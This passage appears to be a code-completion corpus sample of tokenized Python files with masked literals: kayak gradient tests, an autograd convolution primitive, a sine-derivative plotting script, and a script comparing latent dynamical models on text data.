<EOL> np_X = npr . randn ( ) <EOL> if np . all ( np . abs ( np_X ) > <NUM_LIT:0.1> ) : <EOL> break <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert kayak . util . checkgrad ( X , out ) < MAX_GRAD_DIFF <EOL> def test_tensor_value ( ) : <EOL> npr . seed ( <NUM_LIT:9> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> np_X = npr . randn ( <NUM_LIT:10> , <NUM_LIT:20> , <NUM_LIT:5> ) <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert close_float ( out . value , wt * np . sum ( <NUM_LIT:1.0> - np . exp ( - np . abs ( np_X ) ) ) ) <EOL> def test_tensor_grad ( ) : <EOL> npr . seed ( <NUM_LIT:10> ) <EOL> for ii in xrange ( NUM_TRIALS ) : <EOL> while True : <EOL> np_X = npr . randn ( ) <EOL> if np . all ( np . abs ( np_X ) > <NUM_LIT:0.1> ) : <EOL> break <EOL> wt = np . exp ( npr . randn ( ) ) <EOL> X = kayak . Parameter ( np_X ) <EOL> out = kayak . NExp ( X , weight = wt ) <EOL> assert kayak . util . checkgrad ( X , out ) < MAX_GRAD_DIFF </s>
<s> from __future__ import absolute_import <EOL> import scipy . signal <EOL> from autograd . core import primitive <EOL> import autograd . numpy as np <EOL> import numpy as npo <EOL> import itertools as it <EOL> from numpy . lib . stride_tricks import as_strided <EOL> from builtins import range , zip <EOL> from future . utils import iteritems <EOL> def prod ( x ) : <EOL> return npo . prod ( x , dtype = int ) <EOL> @ primitive <EOL> def convolve ( A , B , axes = None , dot_axes = [ ( ) , ( ) ] , mode = '<STR_LIT>' ) : <EOL> assert mode in [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" . format ( mode ) <EOL> if axes is None : <EOL> axes = [ list ( range ( A . ndim ) ) , list ( range ( A . ndim ) ) ] <EOL> wrong_order = any ( [ B . shape [ ax_B ] < A . shape [ ax_A ] for ax_A , ax_B in zip ( * axes ) ] ) <EOL> if wrong_order : <EOL> if mode == '<STR_LIT>' and not all ( [ B . shape [ ax_B ] <= A . shape [ ax_A ] for ax_A , ax_B in zip ( * axes ) ] ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif mode != '<STR_LIT>' or B . size <= A . size : <EOL> i1 = B . ndim - len ( dot_axes [ <NUM_LIT:1> ] ) - len ( axes [ <NUM_LIT:1> ] ) <EOL> i2 = i1 + A . ndim - len ( dot_axes [ <NUM_LIT:0> ] ) - len ( axes [ <NUM_LIT:0> ] ) <EOL> i3 = i2 + len ( axes [ <NUM_LIT:0> ] ) <EOL> ignore_B = list ( range ( i1 ) ) <EOL> ignore_A = list ( range ( i1 , i2 ) ) <EOL> conv = list ( range ( i2 , i3 ) ) <EOL> return convolve ( B , A , axes = axes [ : : - <NUM_LIT:1> ] , dot_axes = dot_axes [ : : - <NUM_LIT:1> ] , mode = mode ) . transpose ( ignore_A + ignore_B + conv ) <EOL> if mode == '<STR_LIT>' : <EOL> B = pad_to_full ( B , A , axes [ : : - <NUM_LIT:1> ] ) <EOL> B_view_shape = list ( B . shape ) <EOL> B_view_strides = list ( B . strides ) <EOL> flipped_idxs = [ slice ( None ) ] * A . ndim <EOL> for ax_A , ax_B in zip ( * axes ) : <EOL> B_view_shape . append ( abs ( B . shape [ ax_B ] - A . shape [ ax_A ] ) + <NUM_LIT:1> ) <EOL> B_view_strides . append ( B . strides [ ax_B ] ) <EOL> B_view_shape [ ax_B ] = A . shape [ ax_A ] <EOL> flipped_idxs [ ax_A ] = slice ( None , None , - <NUM_LIT:1> ) <EOL> B_view = as_strided ( B , B_view_shape , B_view_strides ) <EOL> A_view = A [ flipped_idxs ] <EOL> all_axes = [ list ( axes [ i ] ) + list ( dot_axes [ i ] ) for i in [ <NUM_LIT:0> , <NUM_LIT:1> ] ] <EOL> return einsum_tensordot ( A_view , B_view , all_axes ) <EOL> def einsum_tensordot ( A , B , axes , reverse = False ) : <EOL> A_axnums = list ( range ( A . ndim ) ) <EOL> B_axnums = list ( range ( A . ndim , A . ndim + B . ndim ) ) <EOL> sum_axnum = A . ndim + B . ndim <EOL> for i_sum , ( i_A , i_B ) in enumerate ( zip ( * axes ) ) : <EOL> A_axnums [ i_A ] = sum_axnum + i_sum <EOL> B_axnums [ i_B ] = sum_axnum + i_sum <EOL> return npo . einsum ( A , A_axnums , B , B_axnums ) <EOL> def pad_to_full ( A , B , axes ) : <EOL> A_pad = [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] * A . ndim <EOL> for ax_A , ax_B in zip ( * axes ) : <EOL> A_pad [ ax_A ] = ( B . shape [ ax_B ] - <NUM_LIT:1> , ) * <NUM_LIT:2> <EOL> return npo . pad ( A , A_pad , mode = '<STR_LIT>' ) <EOL> def parse_axes ( A_shape , B_shape , conv_axes , dot_axes , mode ) : <EOL> A_ndim , B_ndim = len ( A_shape ) , len ( B_shape ) <EOL> if conv_axes is None : <EOL> conv_axes = [ list ( range ( A_ndim ) ) , list ( range ( A_ndim ) ) ] <EOL> axes = { '<STR_LIT:A>' : { '<STR_LIT>' : list ( conv_axes [ <NUM_LIT:0> ] ) , <EOL> '<STR_LIT>' : list ( dot_axes [ <NUM_LIT:0> ] ) , <EOL> '<STR_LIT:ignore>' : [ i for i in range ( A_ndim ) <EOL> if i not in conv_axes [ <NUM_LIT:0> ] and i not in dot_axes [ <NUM_LIT:0> ] ] } , <EOL> '<STR_LIT:B>' : { '<STR_LIT>' : list ( conv_axes [ <NUM_LIT:1> ] ) , <EOL> '<STR_LIT>' : list ( dot_axes [ <NUM_LIT:1> ] ) , <EOL> '<STR_LIT:ignore>' : [ i for i in range ( B_ndim ) <EOL> if i not in conv_axes [ <NUM_LIT:1> ] and i not in dot_axes [ <NUM_LIT:1> ] ] } } <EOL> assert len ( axes [ '<STR_LIT:A>' ] [ '<STR_LIT>' ] ) == len ( axes [ '<STR_LIT:B>' ] [ '<STR_LIT>' ] ) <EOL> assert len ( axes [ '<STR_LIT:A>' ] [ '<STR_LIT>' ] ) == len ( axes [ '<STR_LIT:B>' ] [ '<STR_LIT>' ] ) <EOL> i1 = len ( axes [ '<STR_LIT:A>' ] [ '<STR_LIT:ignore>' ] ) <EOL> i2 = i1 + len ( axes [ '<STR_LIT:B>' ] [ '<STR_LIT:ignore>' ] ) <EOL> i3 = i2 + len ( axes [ '<STR_LIT:A>' ] [ '<STR_LIT>' ] ) <EOL> axes [ '<STR_LIT>' ] = { '<STR_LIT>' : list ( range ( i1 ) ) , <EOL> '<STR_LIT>' : list ( range ( i1 , i2 ) ) , <EOL> '<STR_LIT>' : list ( range ( i2 , i3 ) ) } <EOL> conv_shape = [ compute_conv_size ( A_shape [ i ] , B_shape [ j ] , mode ) <EOL> for i , j in zip ( axes [ '<STR_LIT:A>' ] [ '<STR_LIT>' ] , axes [ '<STR_LIT:B>' ] [ '<STR_LIT>' ] ) ] <EOL> shapes = { '<STR_LIT:A>' : { s : [ A_shape [ i ] for i in ax ] for s , ax in iteritems ( axes [ '<STR_LIT:A>' ] ) } , <EOL> '<STR_LIT:B>' : { s : [ B_shape [ i ] for i in ax ] for s , ax in iteritems ( axes [ '<STR_LIT:B>' ] ) } } <EOL> shapes [ '<STR_LIT>' ] = { '<STR_LIT>' : shapes [ '<STR_LIT:A>' ] [ '<STR_LIT:ignore>' ] , <EOL> '<STR_LIT>' : shapes [ '<STR_LIT:B>' ] [ '<STR_LIT:ignore>' ] , <EOL> '<STR_LIT>' : conv_shape } <EOL> return axes , shapes <EOL> def compute_conv_size ( A_size , B_size , mode ) : <EOL> if mode == '<STR_LIT>' : <EOL> return A_size + B_size - <NUM_LIT:1> <EOL> elif mode == '<STR_LIT>' : <EOL> return A_size <EOL> elif mode == '<STR_LIT>' : <EOL> return abs ( A_size - B_size ) + <NUM_LIT:1> <EOL> else : <EOL> raise Exception ( "<STR_LIT>" . format ( mode ) ) <EOL> def flipped_idxs ( ndim , axes ) : <EOL> new_idxs = [ slice ( None ) ] * ndim <EOL> for ax in axes : <EOL> new_idxs [ ax ] = slice ( None , None , - <NUM_LIT:1> ) <EOL> return new_idxs <EOL> def make_grad_convolve ( argnum , ans , A , B , axes = None , dot_axes = [ ( ) , ( ) ] , mode = '<STR_LIT>' ) : <EOL> assert mode in [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" . format ( mode ) <EOL> axes , shapes = parse_axes ( A . shape , B . shape , axes , dot_axes , mode ) <EOL> if argnum == <NUM_LIT:0> : <EOL> X , Y = A , B <EOL> _X_ , _Y_ = '<STR_LIT:A>' , '<STR_LIT:B>' <EOL> ignore_Y = '<STR_LIT>' <EOL> elif argnum == <NUM_LIT:1> : <EOL> X , Y = B , A <EOL> _X_ , _Y_ = '<STR_LIT:B>' , '<STR_LIT:A>' <EOL> ignore_Y = '<STR_LIT>' <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" . format ( argnum ) ) <EOL> if mode == '<STR_LIT>' : <EOL> new_mode = '<STR_LIT>' <EOL> else : <EOL> if any ( [ x_size > y_size for x_size , y_size in zip ( shapes [ _X_ ] [ '<STR_LIT>' ] , shapes [ _Y_ ] [ '<STR_LIT>' ] ) ] ) : <EOL> new_mode = '<STR_LIT>' <EOL> else : <EOL> new_mode = '<STR_LIT>' <EOL> def grad_fun ( g ) : <EOL> result = convolve ( g , Y [ flipped_idxs ( Y . ndim , axes [ _Y_ ] [ '<STR_LIT>' ] ) ] , <EOL> axes = [ axes [ '<STR_LIT>' ] [ '<STR_LIT>' ] , axes [ _Y_ ] [ '<STR_LIT>' ] ] , <EOL> dot_axes = [ axes [ '<STR_LIT>' ] [ ignore_Y ] , axes [ _Y_ ] [ '<STR_LIT:ignore>' ] ] , <EOL> mode = new_mode ) <EOL> new_order = npo . argsort ( axes [ _X_ ] [ '<STR_LIT:ignore>' ] + axes [ _X_ ] [ '<STR_LIT>' ] + axes [ _X_ ] [ '<STR_LIT>' ] ) <EOL> return np . transpose ( result , new_order ) <EOL> return grad_fun <EOL> convolve . defgrads ( make_grad_convolve , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> import autograd . numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from autograd import grad <EOL> from builtins import range , map <EOL> def fun ( x ) : <EOL> return np . sin ( x ) <EOL> d_fun = grad ( fun ) <EOL> dd_fun = grad ( d_fun ) <EOL> x = np . linspace ( - <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> plt . plot ( x , list ( map ( fun , x ) ) , x , list ( map ( d_fun , x ) ) , x , list ( map ( dd_fun , x ) ) ) <EOL> plt . xlim ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) <EOL> plt . ylim ( [ - <NUM_LIT> , <NUM_LIT> ] ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . clf ( ) <EOL> def fun ( x ) : <EOL> currterm = x <EOL> ans = currterm <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> print ( i , end = '<STR_LIT:U+0020>' ) <EOL> currterm = - currterm * x ** <NUM_LIT:2> / ( ( <NUM_LIT:2> * i + <NUM_LIT:3> ) * ( <NUM_LIT:2> * i + <NUM_LIT:2> ) ) <EOL> ans = ans + currterm <EOL> if np . abs ( currterm ) < <NUM_LIT> : break <EOL> return ans <EOL> d_fun = grad ( fun ) <EOL> dd_fun = grad ( d_fun ) <EOL> x = np . linspace ( - <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:100> ) <EOL> plt . plot ( x , list ( map ( fun , x ) ) , x , list ( map ( d_fun , x ) ) , x , list ( map ( dd_fun , x ) ) ) <EOL> plt . xlim ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) <EOL> plt . ylim ( [ - <NUM_LIT> , <NUM_LIT> ] ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . clf ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os <EOL> import gzip <EOL> import time <EOL> import cPickle <EOL> import collections <EOL> import numpy as np <EOL> from scipy . misc import logsumexp <EOL> from sklearn . feature_extraction . text import CountVectorizer <EOL> import matplotlib . pyplot as plt <EOL> from hips . plotting . layout import create_figure <EOL> import brewer2mpl <EOL> from pgmult . lds import MultinomialLDS <EOL> from pgmult . particle_lds import LogisticNormalMultinomialLDS , ParticleSBMultinomialLDS <EOL> from pgmult . hmm import MultinomialHMM <EOL> from pgmult . utils import pi_to_psi <EOL> from pylds . models import NonstationaryLDS <EOL> from pybasicbayes . distributions import GaussianFixed , Multinomial , Regression <EOL> from pybasicbayes . util . text import progprint_xrange <EOL> from autoregressive . distributions import AutoRegression <EOL> colors = brewer2mpl . get_map ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:9> ) . mpl_colors <EOL> goodcolors = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , ] ) <EOL> colors = np . array ( colors ) [ goodcolors ] <EOL> np . seterr ( invalid = "<STR_LIT>" ) <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> np . seterr ( invalid = "<STR_LIT>" ) <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> K = <NUM_LIT:1000> <EOL> def load ( filename = os . path . join ( "<STR_LIT:data>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as infile : <EOL> bigstr = infile . read ( ) <EOL> docs = [ bigstr . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) . translate ( None , "<STR_LIT>" ) ] <EOL> vectorizer = CountVectorizer ( stop_words = '<STR_LIT>' , max_features = K ) . fit ( docs ) <EOL> docs = [ make_onehot_seq ( doc , vectorizer ) for doc in docs ] <EOL> words = vectorizer . vocabulary_ . keys ( ) <EOL> usage = np . array ( [ doc . sum ( <NUM_LIT:0> ) for doc in docs ] ) . sum ( <NUM_LIT:0> ) <EOL> perm = np . argsort ( usage ) [ : : - <NUM_LIT:1> ] <EOL> docs = [ doc [ : , perm ] for doc in docs ] <EOL> words = np . array ( words ) [ perm ] <EOL> return docs , words <EOL> def filter_wordseq ( doc , vectorizer ) : <EOL> return [ w for w in doc if w in vectorizer . vocabulary_ ] <EOL> def make_onehot_seq ( doc , vectorizer ) : <EOL> lst = filter_wordseq ( vectorizer . build_analyzer ( ) ( doc ) , vectorizer ) <EOL> indices = { word : idx for idx , word in enumerate ( vectorizer . vocabulary_ . keys ( ) ) } <EOL> out = np . zeros ( ( len ( lst ) , len ( indices ) ) ) <EOL> for wordidx , word in enumerate ( lst ) : <EOL> out [ wordidx , indices [ word ] ] = <NUM_LIT:1> <EOL> return out <EOL> Results = collections . namedtuple ( "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def fit_lds_model ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> mus = [ X . sum ( <NUM_LIT:0> ) + <NUM_LIT:0.1> for X in Xs ] <EOL> mus = [ mu / mu . sum ( ) for mu in mus ] <EOL> models = [ MultinomialLDS ( K , D , <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = <NUM_LIT:1> * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> sigma_C = <NUM_LIT:1.> , mu_pi = mus [ i ] ) for i in xrange ( Nx ) ] <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> [ model . resample_parameters ( ) for model in models ] <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xt , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xt , M = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , models , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_hmm ( Xs , Xtest , D_hmm , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D_hmm ) <EOL> models = [ MultinomialHMM ( K , D_hmm , alpha_0 = <NUM_LIT> ) for _ in xrange ( Nx ) ] <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xtr , Xte , model in zip ( Xs , Xtest , models ) : <EOL> pred_ll += model . log_likelihood ( np . vstack ( ( Xtr , Xte ) ) ) - model . log_likelihood ( ) <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_gaussian_lds_model ( Xs , Xtest , D_gauss_lds , N_samples = <NUM_LIT:100> ) : <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D_gauss_lds ) <EOL> models = [ NonstationaryLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = <NUM_LIT:1> * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) ) <EOL> for _ in xrange ( Nx ) ] <EOL> Xs_centered = [ X - np . mean ( X , axis = <NUM_LIT:0> ) [ None , : ] + <NUM_LIT> * np . random . randn ( * X . shape ) for X in Xs ] <EOL> for X , model in zip ( Xs_centered , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xtr , Xte , model in zip ( Xs_centered , Xtest , models ) : <EOL> Npred = <NUM_LIT:10> <EOL> Tpred = Xte . shape [ <NUM_LIT:0> ] <EOL> preds = model . sample_predictions ( Xtr , Tpred , Npred = Npred ) <EOL> inds = np . argmax ( preds , axis = <NUM_LIT:1> ) <EOL> pi = np . array ( [ np . bincount ( inds [ t ] , minlength = K ) for t in xrange ( Tpred ) ] ) / float ( Npred ) <EOL> assert np . allclose ( pi . sum ( axis = <NUM_LIT:1> ) , <NUM_LIT:1.0> ) <EOL> pi = np . clip ( pi , <NUM_LIT> , <NUM_LIT:1.0> ) <EOL> pi /= pi . sum ( axis = <NUM_LIT:1> ) [ : , None ] <EOL> pred_ll += np . sum ( [ Multinomial ( weights = pi [ t ] , K = K ) . log_likelihood ( Xte [ t ] [ None , : ] ) <EOL> for t in xrange ( Tpred ) ] ) <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_ln_lds_model ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D ) <EOL> mus = [ X . sum ( <NUM_LIT:0> ) + <NUM_LIT:0.1> for X in Xs ] <EOL> mus = [ np . log ( mu / mu . sum ( ) ) for mu in mus ] <EOL> models = [ LogisticNormalMultinomialLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = D * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = D * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) , <EOL> sigma_C = <NUM_LIT:1.0> , mu = mu ) for mu in mus ] <EOL> for model in models : <EOL> model . A = <NUM_LIT:0.5> * np . eye ( D ) <EOL> model . sigma_states = np . eye ( D ) <EOL> model . C = <NUM_LIT:1.0> * np . random . randn ( K , D ) <EOL> model . sigma_obs = <NUM_LIT:0.1> * np . eye ( K ) <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xte , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xte , Npred = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def fit_lds_model_with_pmcmc ( Xs , Xtest , D , N_samples = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> Nx = len ( Xs ) <EOL> assert len ( Xtest ) == Nx <EOL> print ( "<STR_LIT>" % D ) <EOL> models = [ ParticleSBMultinomialLDS ( <EOL> init_dynamics_distn = GaussianFixed ( mu = np . zeros ( D ) , sigma = <NUM_LIT:1> * np . eye ( D ) ) , <EOL> dynamics_distn = AutoRegression ( nu_0 = D + <NUM_LIT:1> , S_0 = D * np . eye ( D ) , M_0 = np . zeros ( ( D , D ) ) , K_0 = D * np . eye ( D ) ) , <EOL> emission_distn = Regression ( nu_0 = K + <NUM_LIT:1> , S_0 = K * np . eye ( K ) , M_0 = np . zeros ( ( K , D ) ) , K_0 = K * np . eye ( D ) ) , <EOL> mu = pi_to_psi ( np . ones ( K ) / K ) , <EOL> sigma_C = <NUM_LIT:1.0> ) <EOL> for _ in xrange ( Nx ) ] <EOL> for model in models : <EOL> model . A = <NUM_LIT:0.5> * np . eye ( D ) <EOL> model . sigma_states = np . eye ( D ) <EOL> model . C = np . random . randn ( K - <NUM_LIT:1> , D ) <EOL> model . sigma_obs = <NUM_LIT:0.1> * np . eye ( K ) <EOL> for X , model in zip ( Xs , models ) : <EOL> model . add_data ( X ) <EOL> def compute_pred_ll ( ) : <EOL> pred_ll = <NUM_LIT:0> <EOL> for Xte , model in zip ( Xtest , models ) : <EOL> pred_ll += model . predictive_log_likelihood ( Xte , Npred = <NUM_LIT:100> ) [ <NUM_LIT:0> ] <EOL> return pred_ll <EOL> init_results = ( <NUM_LIT:0> , None , np . nan , np . nan , compute_pred_ll ( ) ) <EOL> def resample ( ) : <EOL> tic = time . time ( ) <EOL> [ model . resample_model ( ) for model in models ] <EOL> toc = time . time ( ) - tic <EOL> return toc , None , np . nan , np . nan , compute_pred_ll ( ) <EOL> times , samples , lls , test_lls , pred_lls = map ( np . array , zip ( * ( [ init_results ] + <EOL> [ resample ( ) for _ in progprint_xrange ( N_samples , perline = <NUM_LIT:5> ) ] ) ) ) <EOL> timestamps = np . cumsum ( times ) <EOL> return Results ( lls , test_lls , pred_lls , samples , timestamps ) <EOL> def plot_log_likelihood ( results , names , results_dir , outname = "<STR_LIT>" ) : <EOL> plt . figure ( figsize = ( <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> for i , ( result , name ) in enumerate ( zip ( results , names ) ) : <EOL> plt . plot ( result . timestamps , result . lls , lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , outname ) ) <EOL> plt . tight_layout ( ) <EOL> def plot_pred_log_likelihood ( results , names , results_dir , <EOL> outname = "<STR_LIT>" , <EOL> smooth = True , burnin = <NUM_LIT:0> ) : <EOL> baseline = <NUM_LIT:0> <EOL> normalizer = <NUM_LIT:0> <EOL> for Xtr , Xte in zip ( Xtrain , Xtest ) : <EOL> pi_emp = Xtr . sum ( <NUM_LIT:0> ) / float ( Xtr . sum ( ) ) <EOL> pi_emp = np . clip ( pi_emp , <NUM_LIT> , np . inf ) <EOL> pi_emp /= pi_emp . sum ( ) <EOL> baseline += Multinomial ( weights = pi_emp , K = Xtr . shape [ <NUM_LIT:1> ] ) . log_likelihood ( Xte ) . sum ( ) <EOL> normalizer += Xte . sum ( ) <EOL> fig = create_figure ( figsize = ( <NUM_LIT> , <NUM_LIT> ) , transparent = True ) <EOL> fig . set_tight_layout ( True ) <EOL> for i , ( result , name ) in enumerate ( zip ( results , names ) ) : <EOL> if result . pred_lls . ndim == <NUM_LIT:2> : <EOL> pred_ll = result . pred_lls [ : , <NUM_LIT:0> ] <EOL> else : <EOL> pred_ll = result . pred_lls <EOL> if smooth : <EOL> win = <NUM_LIT:10> <EOL> pad_pred_ll = np . concatenate ( ( pred_ll [ <NUM_LIT:0> ] * np . ones ( win ) , pred_ll ) ) <EOL> smooth_pred_ll = np . array ( [ logsumexp ( pad_pred_ll [ j - win : j + <NUM_LIT:1> ] ) - np . log ( win ) <EOL> for j in xrange ( win , pad_pred_ll . size ) ] ) <EOL> plt . plot ( np . clip ( result . timestamps [ burnin : ] , <NUM_LIT> , np . inf ) , <EOL> ( smooth_pred_ll [ burnin : ] - baseline ) / normalizer , <EOL> lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> else : <EOL> plt . plot ( np . clip ( result . timestamps [ burnin : ] , <NUM_LIT> , np . inf ) , <EOL> result . pred_lls [ burnin : ] , <EOL> lw = <NUM_LIT:2> , color = colors [ i ] , label = name ) <EOL> xmin = <NUM_LIT:10> ** <NUM_LIT:0> <EOL> xmax = <NUM_LIT:10> ** <NUM_LIT> <EOL> plt . plot ( [ xmin , xmax ] , np . zeros ( <NUM_LIT:2> ) , '<STR_LIT>' , lw = <NUM_LIT:0.5> ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . xlim ( xmin , xmax ) <EOL> plt . xscale ( "<STR_LIT>" ) <EOL> plt . ylabel ( "<STR_LIT>" ) <EOL> plt . ylim ( - <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , outname ) ) <EOL> def plot_pred_ll_vs_D ( all_results , Ds , Xtrain , Xtest , <EOL> results_dir , models = None ) : <EOL> N = len ( Ds ) <EOL> M = len ( all_results [ <NUM_LIT:0> ] ) <EOL> T = len ( all_results [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . pred_lls ) <EOL> pred_lls = np . zeros ( ( N , M , T ) ) <EOL> for n in xrange ( N ) : <EOL> for m in xrange ( M ) : <EOL> if all_results [ n ] [ m ] . pred_lls . ndim == <NUM_LIT:2> : <EOL> pred_lls [ n , m ] = all_results [ n ] [ m ] . pred_lls [ : , <NUM_LIT:0> ] <EOL> else : <EOL> pred_lls [ n , m ] = all_results [ n ] [ m ] . pred_lls <EOL> burnin = T // <NUM_LIT:2> <EOL> pred_ll_mean = logsumexp ( pred_lls [ : , : , burnin : ] , axis = - <NUM_LIT:1> ) - np . log ( T - burnin ) <EOL> pred_ll_std = np . zeros_like ( pred_ll_mean ) <EOL> 